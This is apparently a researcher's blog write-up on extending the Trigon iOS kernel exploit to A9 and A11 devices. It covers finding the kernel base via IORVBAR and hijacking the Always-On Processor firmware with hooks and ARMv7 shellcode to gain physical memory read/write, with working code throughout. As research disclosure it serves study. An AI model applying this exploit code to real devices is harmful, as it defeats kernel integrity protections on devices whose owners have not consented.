A few months ago, I released a kernel exploit called Trigon. It was significant in that it was deterministic - that is, it cannot fail. However, at the time of release, only A10 devices on iOS 13 - 15 were supported. Since then, support has been implemented for A9(X) and A11 devices. In this blog post, I am going to dive into what it took to support these new devices - I made use of some pretty interesting techniques, which I believe are worthy of a second part to the original writeup.

If you haven’t read the first part of this blog post, you can do so here, and you can find the source code here. This one is a little more technical in my opinion, but as always, I will happily answer questions via Twitter or email.

Where did we leave off?

For starters, let’s remind ourselves how the original release of Trigon’s exploit strategy worked. First, it would find the mapping base via the iboot-handoff region. It would then use this to map the KTRR limit registers and find the kernel base by scanning the read-only region protected by KTRR. After that, it would find the pv_head_table structure in the kernel, using that to then search for IOSurface objects in kernel memory in order to find one we could control for full kernel read/write.

However, when it came to other devices and versions, there were quite a few issues with the various techniques:

  • KTRR limit registers do not exist on A9 and below
  • Pages marked as page tables existed within the read-only region on A11 (remember, we cannot read those)

One of the most inconsistent parts of the exploit is the method used to find the kernel base. That is, there is no surefire method to do so on all arm64 devices. Hence, it is split into two different methods and both will be detailed in this writeup.

Background: KTRR

Kernel Text Read-only Region (KTRR) is a mitigation that was introduced with the A10 chip. Essentially, it is a hardware-enforced kernel code integrity mechanism, which means the hardware will prevent you from overwriting sensitive kernel code and data.

There are two different protections it will enforce:

  • No writes can be made to the protected region
  • No instruction fetches can be made from the kernel outside the protected region

These protections ensure that the kernel will only ever execute the correct code, and only that code - nothing else in memory.

KTRR is enforced at two levels. Firstly, you have MMU KTRR. Every CPU core (and some coprocessors) will have a Memory Management Unit (MMU). This will also control things such as address translation via page tables. There are three CPU registers for MMU KTRR - the start, the end and the lock. Once the lock has been written to once, you cannot unlock it or modify the start and end registers. As these are actual CPU registers, we cannot simply read them from memory, because they don’t exist anywhere except on the CPU itself.

This is where the second level of KTRR comes in. Notice how I said that “some coprocessors” will have a MMU? Well, for the ones that don’t (such as the AES engine), there has to be another layer of protection against overwriting kernel code. This is where the Apple Memory Cache Controller (AMCC) comes in. Each device has one AMCC (there are exceptions, such as the A9X chip, which has two), which governs and oversees every read, write and execution anywhere in RAM. This also enforces KTRR, but it has the start, end and lock registers in the form of MMIO, which means they can be mapped via their respective physical address and read via the Trigon primitive!

For those curious, A7 - A9 devices have a software-equivalent of KTRR, in the form of a monitor called the KPP (kernel patch protection). This runs at a higher privilege level than the kernel (EL3, as opposed to EL1 for the kernel) and will perform periodic checks to ensure the kernel has not been tampered with. While it does work, it is weaker than KTRR and does not have the hardware enforcement guarantees that KTRR does.

A12+ devices have Configurable Text Read-only Region (CTRR), which is more configurable than KTRR, as the name suggests, but essentially does the same as KTRR in that it is hardware enforced.

IORVBAR

Originally, I used the KTRR limit registers that belong to the AMCC in order to determine the start and end addresses of the protected kernel region. This worked great for A10, allowing me to find the kernel base quickly and easily. However, on A11 devices, I would run into page tables within the protected region, which was really odd. This, of course, would lead to a panic and so I could not find the kernel base this way.

I then decided to try another piece of MMIO, one that I mistakenly thought I’d already tried (and failed) to use - IORVBAR. IORVBAR stands for the IO Reset Vector Base Address Register. For the purposes of this writeup, it is the address that the CPU will jump to after reset. When a CPU core comes out of reset, the MMU is turned off, which means there will be no address translation available. This is not an issue for us, obviously - the MMU is turned on during the IORVBAR routine. It is, in fact, advantageous, because if there is no address translation, everything must be in terms of physical addresses! On A10 and A11 devices, IORVBAR will be the physical address of code within the kernelcache, which gives us a way to find the kernel base while also guaranteeing that we will not run into any page tables during that time. We simply search backwards from IORVBAR until we find the kernel base, and then we are done!

void *iorvbar_ptr = (void *)map_page(gDeviceInfo.iorvbar, VM_PROT_READ);
volatile uint64_t iorvbar = *(volatile uint64_t *)(iorvbar_ptr) & 0xFFFFFF800;
unmap_page((uint64_t)iorvbar_ptr);
for (uint64_t pa = iorvbar;; pa -= pages(1)) {
    if (physread32(pa) == MH_MAGIC_64
        && physread32(pa + 12) == MH_EXECUTE) {
        gDeviceInfo.kernelPhysBase = pa;
        gDeviceInfo.kernelBase = physread64(gDeviceInfo.kernelPhysBase + 0x38);
        gDeviceInfo.kernelSlide = gDeviceInfo.kernelBase - 0xFFFFFFF007004000;
        break;
    }
}

After a small patchfinding fix for certain A11 versions, the exploit worked on all A10(X) and A11 devices within the supported version range. However, this technique does not work on A7 - A9 devices. This is because IORVBAR points to an address inside the KPP, which is in a TrustZone. The TrustZone is an ARM feature that allows completely isolated memory regions for critical hardware or software. What this means for us is that we cannot read any TrustZone memory with the Trigon primitive. Therefore, IORVBAR does not help us find the kernel base.

Coprocessors

The main processor that runs XNU is called the Application Processor (AP). However, the iPhone does not use a single processor, but instead uses many. Some examples include the Secure Enclave Processor (SEP), the Always-On Processor (AOP) and the Apple NAND Storage processor (ANS). But why is this relevant to Trigon?

The issue that we have with mapping page tables comes from code in XNU, which runs on the AP. If a coprocessor maps a page table, XNU will never know - and with our physical mapping primitive, we can actually map coprocessor page tables, since XNU won’t stop us from doing that either! This technique was heavily mitigated in arm64e SoCs through the use of DARTs (Device Address Resolution Tables). DARTs will control the physical memory that a coprocessor is allowed to access, even if you can control its page tables. The PPL, or the SPTM on newer devices/versions, will prevent you from mapping a DART - and almost every single coprocessor is behind one on such devices.

Nevertheless, on arm64, most coprocessors are restricted only by their page tables. As a bonus, on arm64, coprocessor firmware is not protected by KTRR, so we can overwrite the firmwares to essentially execute whatever shellcode we want on a coprocessor!

Always-On Processor

So, with that in mind, me and @staturnz set out to hack a coprocessor. After a suggestion from @Siguza, the coprocessor that we chose to target was the always-on processor, since the firmware’s base address was in the iboot-handoff region and as such we could easily locate it with the Trigon primitive.

Investigation

After dumping the first few bytes of the supposed firmware region, it at first looked wrong - several 0xfeffffeas in a row… surely that’s not machine code.

However, I then remembered that ARMv7 processors (of which the AOP is one of them) have their exception vector at address 0x0. The exception vector is like a table of different handlers for different exceptions that may occur on the CPU. When such an exception occurs, it will jump to the correct handler in the exception vector, which is usually a b #0xN instruction that will simply branch to the proper handler elsewhere in the code. I threw the bytes into rasm2 to see if it yielded any valid instructions, and sure enough, the instructions resembled an ARM exception vector.

The AOP's exception vector in assembly

So, it looked like we were on the right track! After that, we could dump the rest of the firmware and analyse it in IDA. After some analysis, staturnz found a function that was called several times a second, which we appropriately called target_func in IDA.

Target function for hook

The function seems to be saving and storing several CPU-relevant addresses and values, such as thread IDs and certain registers. However, what we were interested in was whether this was a valid target to hook. Hooking a function is where the code will branch to a ‘hook’ at some point during the function, run that code, and then return to where it was originally executing. It is essentially an easy way for us to hijack the control flow to run our custom shellcode without making any major changes to the firmware.

But first, we tried overwriting a few existing instructions to get somewhat of a proof-of-concept. After overwriting the start of that function to set some recognisable register values and then try to load from an invalid address, the panic logs proved that we could indeed take control of the always-on processor!

AOP panic log with recognisable values

You can also see that the part that says pc=0x01000868 matches up with the address range of the function in IDA. The next objective was to find out some information about the CPU state, most importantly where its page tables are. The CPU will have to system registers, TTBR0 and TTBR1, which are both addresses of page tables. TTBR0 will translate the lower region of the address space, and TTBR1 the higher region. The exact split and cutoff is determined by the TTBCR (Translation Table Base Control Register), but that is outside the scope of this writeup.

AXI? What’s that?!

So, with some extra shellcode modifications, I got the panic log to show me some system register values. You can see TTBR0 in r01 and TTBR1 in r02.

AOP panic log with TTBR values

This confused me, because TTBR0 and TTBR1 are meant to be physical addresses, but 0x79000, for example, is way too low to be a legitimate physical address, even considering the firmware base is around 0x210E00000. However, assuming VA 0x1000000 maps to PA 0x0, I dumped TTBR0 and inspected it:

❯ ./print_in_granularity aop_ttbr0 64
0x0000000000000483
0x0000000000001483
0x0000000000002483
0x0000000000003483
0x0000000000004483
0x0000000000005483
0x0000000000006483
0x0000000000007483
0x0000000000008483
0x0000000000009483
0x000000000000A483
0x000000000000B483
0x000000000000C483
0x000000000000D483
0x000000000000E483
0x000000000000F483
0x0000000000010483
0x0000000000011483
0x0000000000012483
0x0000000000013483
0x0000000000014483
0x0000000000015483

Doesn’t exactly look like a page table… there should be physical addresses in the page table entries. However, if we go a bit further down, we see this:

0x0060000000078403
0x0060000000079403
0x006000000007A403
0x006000000007B403
0x006000000007C403
0x006000000007D403
0x000000000007E002
0x000000000007F002
0x0060000000080403

The 0x006 does look like it comes from a page table entry, more specifically the higher permission bits in an entry. I then checked TTBR1 and saw the following entries that were mapping 0x210000000 up to 0x210E00000 (the AOP firmware base address):

0x0060000210000445
0x0060000210200445
0x0060000210400445
0x0060000210600445
0x0060000210800445
0x0060000210A00445
0x0060000210C00445

By now it was pretty clear these were the correct TTBR0 and TTBR1 addresses, but why were some of the mapped physical addresses so low? We initially thought it was some weird PTE format that used offsets instead of actual addresses, but after discussing this with Siguza, he suggested that it was probably a case of what Apple calls an AXI remapping.

This is an SoC feature that allows a physical address to be remapped for another processor. In this case, the AOP is an ARMv7 coprocessor, so it needs to be at physical address 0x0, at least until its MMU is turned on, allowing the exception vector to be placed at the correct address. However, the AOP is not the only ARMv7 coprocessor, so it can’t actually run from physical address 0x0. Instead, the device will remap the real physical base address of the coprocessor to what it sees as physical address 0x0.

For example, with the AOP, the AP physical address of the firmware is something like 0x210E00000, but to the AOP this is actually physical address 0x0. I’m not entirely certain how large this remapping window spans, but it should cover all of the firmware and necessary memory for the AOP. So when we see a page table entry of 0x0000000000000483 in TTBR0, this isn’t an entry for an invalid physical address, but rather its an entry for the remapped physical address of 0x0!

Mapping DRAM

So, the next thing I tried was mapping normal DRAM (that is, the memory we can access with the Trigon primitive). Sure enough, I was able to remap the first page of AOP firmware to an address I could read from and write to safely with the Trigon primitive, overwrite the firmware there and then trigger a panic.

Remapping AOP firmware to controllable physical memory

After that, I wanted to confirm that the AOP could actually read/write to regular DRAM, and with a little bit of shellcode it was easy to confirm that this was the case. After reading back the value from our app, which is running on the AP, I was able to see that the AOP had written to the shared page.

AOP writing to DRAM address

Great! We can map arbitrary physical addresses into the AOP’s address space, and with some shellcode and hooking we can hopefully use this to gain unrestricted read/write primitives.

Code execution

Hooking the target function in the AOP’s firmware is fairly simple to do in assembly:

ldr pc, pc, #-4
.dword HOOK_VA

This will load the value after the current instruction into the PC, essentially making the CPU jump to HOOK_VA. The actual interesting part of this is the hook’s shellcode. The basic plan we came up with was to map in two pages to the AOP’s memory that the AP could access (and, by extension, we could access with Trigon). The first page would be used for the hook’s shellcode, and the second would be used to ‘send’ values to the AOP shellcode in order to tell it what to do.

The shellcode would then check if a certain address contains a value, and if so it will read from that value and write it back to an adjacent address. Then, the AP would read back the value that the AOP read from that address. That way, the AOP would perform the read of an arbitrary physical address and the AP only has to wait for it to respond with the value.

Below is the very first implementation of AOP-based physical read primitive.

// Create a new page for shellcode
uint64_t shellcodePA = gMappingBase + pages(10);
uint64_t mappedShc = map_page(shellcodePA, VM_PROT_READ | VM_PROT_WRITE);
bzero((void *)mappedShc, pages(1));
uint32_t shellcodePTE = 0;
uint32_t shellcodeVA = aop_find_unmapped_va(ttbr0, AOP_VIRT_BASE, &shellcodePTE);
aop_write64(shellcodePTE, PTE_TTBR0(shellcodePA));
asm volatile("dsb sy");

// Create a new page for communicating with the AOP
uint64_t scratchPage = gMappingBase + pages(11);
uint64_t mappedScratch = map_page(scratchPage, VM_PROT_READ | VM_PROT_WRITE);
bzero((void *)mappedScratch, pages(1));
uint32_t scratchPTE = 0;
uint32_t scratchVA = aop_find_unmapped_va(ttbr0, AOP_VIRT_BASE, &scratchPTE);
aop_write64(scratchPTE, PTE_TTBR0(scratchPage));
asm volatile("dsb sy");

// Make all addresses in TTBR0 read/write/execute
aop_make_ttbr0_rwx(ttbr0);

uint32_t controlledPTE = 0;
uint32_t controlledVA = aop_find_unmapped_va(ttbr0, AOP_VIRT_BASE, &controlledPTE);
uint32_t hook[] = {
    // r9, r8, r7, r3 are good to use

    // Flush TLB and caches
    0xEE080F17, // MCR p15, 0, r0, c8, c7, 0
    0xF57FF04F, // DSB
    0xF57FF06F, // ISB
    
    // SCRATCH + 0x0: VA to read
    // SCRATCH + 0x8: value read
    armv7_gen_ldr_rd_rn_imm(3, 15, -4),
    scratchVA,
    
    // Check if PA is in register
    0xe5938000, // ldr r8, [r3]
    0xe3580000, // cmp r8, #0

    // If non-zero, go to next stage
    0x1a000000, // bne #8

    // Else, go to the nop (end of payload)
    0xea000003, // b #0x14

    // Read the value
    0xe5983000, // ldr r3, [r8]
    
    // Store it in the value MMIO
    armv7_gen_ldr_rd_rn_imm(9, 15, -4),
    scratchVA + 8,
    0xe5893000, // str r3, [r9]

    0x00000000, // nop
};
aop_install_hook(0x1000858, shellcodeVA, mappedShc, hook, sizeof(hook));

I could then read arbitrary addresses like so:

#define PA_MMIO ((volatile uint32_t *)(mappedScratch))
#define VAL_MMIO ((volatile uint32_t *)(mappedScratch + 8))
#define AOP_PHYSREAD32(x, y) \
do { \
    aop_write64(controlledPTE, PTE_TTBR0(x & ~0x3FFF)); \
    asm volatile ("dsb sy"); \
    *VAL_MMIO = 0; \
    *PA_MMIO = controlledVA + (x & 0x3FFF); \
    while (VAL_MMIO == 0) { } \
    aop_write64(controlledPTE, 0); \
    if (y) *y = *VAL_MMIO; \
} while (0); \

int val = 0;
AOP_PHYSREAD32(gDeviceInfo.kernelPhysBase, &val);
printf("aop_physread32(0x%llX) -> 0x%X\n", gDeviceInfo.kernelPhysBase, val);
AOP_PHYSREAD32(gDeviceInfo.kernelPhysBase + 4, &val);
printf("aop_physread32(0x%llX) -> 0x%X\n", gDeviceInfo.kernelPhysBase + 4, val);

That worked great - we had the first proper read primitive using the AOP! The function we hooked is called numerous times per second, so the shellcode will be executed consistently.

Reading kernel base with the AOP

Improving the strategy

Of course, a simple PoC wasn’t good enough. We wanted full read and write primitives. staturnz took this upon himself to do, writing a much more improved payload for the AOP that uses a command number to determine whether to read or write. You can find a copy of this shellcode here. It makes reading as simple as this:

uint32_t aop_physread32(uint64_t pa) {
    aop_await_ready();
    aop_write64(gAOPInfo.targetPTE, (pa & ~0xFFF) | 0x403);
    *(uint32_t *)(gAOPInfo.mapped + OFFSET_OFFSET) = (pa & 0xFFF);
    *(uint32_t *)(gAOPInfo.mapped + VALUE_OFFSET) = 0;
    *(uint32_t *)(gAOPInfo.mapped + CMD_OFFSET) = 2;
    
    aop_flush(gAOPInfo.mapped, 0x4000);
    aop_await_ready();
    return *(uint32_t *)(gAOPInfo.mapped + VALUE_OFFSET);
}

staturnz also found a much better way to hook the target function. The wrapper function that calls the target function does so by loading its address from a value right after the wrapper function.

Stub to the target function

Along with this, we also found a structure stored in the firmware that, amongst other things, holds the addresses of TTBR0 and TTBR1. This makes our work easier, as we don’t have to find them with more complex means and can instead read them from that structure and get straight to code execution!

The final flow goes something like this:

  • Find info structure and target function/stub
  • Read TTBR0 from info structure
  • Map in our shared pages into AOP memory
  • Setup shellcode on one page
  • Overwrite pointer to target function with pointer to shellcode
  • Use the second shared page to tell the AOP what to read and write
  • Profit

The last thing to do was to actually use this for what required it - finding the kernel base. On A9, it worked remarkably fast, taking around 500-1000ms to find the kernel base and leading to a successful exploit.

A9 Trigon exploit with AOP

Cleaning up the AOP hook was fairly simple - you just replaced the function stub with the correct address of the target function, then zero the PTEs used to map in the shared pages. With that, the deterministic exploitation of Trigon on A9 is complete!

As a bonus, with unrestricted read/write, we can also develop an exploit that uses no spray at all. We simply create a single IOSurface, then find it in kernel memory. This involves translating every kernel address via page tables, which we cannot do with the regular Trigon primitive. For the sake of consistency with A10 and A11, which the AOP strategy doesn’t currently implement support for, I did not switch to this technique. However, its still a cool way to build full read/write, and will be much quicker than an object spray.

Translation-based exploit

What about A7 and A8(X)?

The remaining arm64 SoCs, A7 and A8(X), are left unexploited. The AOP was only introduced in A9, so this strategy cannot be used there. However, they do have some other coprocessors, but they are done a little differently to the AOP.

One advantage these SoCs do have is that their kernel physical base isn’t slid. This means that you can find the physical address of the kernel base just once (with another kernel exploit, for example) and then use it on subsequent boots. Since the rest of the exploit should work just fine, it would be viable to do this in a jailbreak, for example, and just provide Trigon with the kernel base in advance.

I did try to get this working for this release of Trigon, but unfortunately experienced some unexplainable issues that I didn’t wish to spend too much time fretting over. Perhaps at a later date I will add support for the A8(X) devices that were dropped with iOS 16.

Conclusion

So, there you have it. Exploiting coprocessors before the kernel itself is certainly a pretty crazy exploit strategy, but it’s actually been seen in the wild before. The fact that most coprocessors are behind a DART nowadays is indicative of the fact that there is a lot of potential in using such an exploit strategy.

Credits to @staturnz once again for doing a lot of work with the AOP strategy. I certainly would not have been able to pull that off alone. There is continued work with the AOP behind the scenes, as we believe it has some further potential… but determining such potential is left as an exercise to the reader.

While I do have an arm64e exploit for Trigon, it does not get code execution on any coprocessors, but a writeup for that may come further down the line. For now, I hope this writeup has been interesting (albeit probably a little complicated!). Again, if you have any questions, please don’t hesitate to email me at [email protected] and I will try and get back to you ASAP.